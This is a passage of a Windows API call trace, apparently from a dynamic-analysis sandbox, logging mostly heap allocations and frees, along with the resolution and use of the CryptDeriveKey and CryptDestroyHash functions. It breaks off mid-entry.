0x2e54f98 [0233.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0233.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0233.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0233.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f558 | out: hHeap=0x970000) returned 1 [0233.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0233.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0233.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0233.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0233.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0233.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0233.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0233.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0233.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0233.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0233.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0233.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0233.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0233.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0233.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0233.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0233.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0233.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0233.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0233.820] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0233.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0233.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0233.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0233.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0233.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0233.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0233.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0233.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0233.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0233.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0233.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0233.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0233.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0233.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0233.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0233.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0233.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0233.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0233.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0233.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0233.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0233.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0233.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0233.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0233.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0233.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0233.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0233.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0233.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0233.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0233.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0233.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0233.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0233.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0233.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0233.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0233.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0233.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0233.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0233.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0233.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0233.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0233.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0233.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0233.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0233.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f558 [0233.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0233.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0233.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0233.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0233.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0233.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0233.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0233.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0233.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0233.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0233.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0233.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0233.823] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0233.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e51370 [0233.823] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e51370, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0233.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0233.823] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDeriveKey") returned 0x75712c90 [0233.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0233.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0233.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0233.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0233.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0233.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0233.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0233.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0233.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0233.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0233.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0233.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0233.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0233.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0233.824] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa87250, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa86f90) returned 1 [0233.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0233.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0233.824] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0233.824] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0233.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0233.824] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0233.825] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0233.825] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0233.825] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0233.825] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0233.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04658 | out: hHeap=0x970000) returned 1 [0233.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0233.825] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0233.825] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0233.825] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0233.825] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e699e8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0233.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0233.826] CryptDestroyHash (hHash=0xa87250) returned 1 [0233.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0233.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0233.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0233.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0233.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0233.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0233.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0233.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0233.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0233.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0233.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0233.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0233.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0233.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0233.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0233.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0233.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0233.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0233.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0233.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0233.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0233.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0233.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0233.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0233.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0233.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0233.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0233.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0233.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0233.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f558 | out: hHeap=0x970000) returned 1 [0233.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0233.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0233.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0233.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0233.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0233.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0233.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0233.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0233.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0233.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0233.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0233.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0233.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0233.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0233.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0233.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0233.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0233.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0233.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0233.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0233.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0233.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0233.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0233.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0233.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0233.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0233.828] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0233.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0233.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0233.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0233.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0233.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0233.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0233.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0233.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0233.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0233.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0233.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0233.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0233.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0233.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0233.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0233.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0233.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0233.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0233.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0233.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0233.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0233.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0233.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0233.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0233.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0233.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0233.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f530 | out: hHeap=0x970000) returned 1 [0233.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0233.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0233.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0233.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0233.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0233.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0233.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0233.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0233.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0233.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0233.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0233.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0233.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3a0 | out: hHeap=0x970000) returned 1 [0233.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0233.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0233.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0233.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f508 | out: hHeap=0x970000) returned 1 [0233.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0233.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f738 | out: hHeap=0x970000) returned 1 [0233.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0233.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3f0 | out: hHeap=0x970000) returned 1 [0233.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0233.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0233.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0233.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f440 | out: hHeap=0x970000) returned 1 [0233.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0233.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0233.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f378 | out: hHeap=0x970000) returned 1 [0233.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0233.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 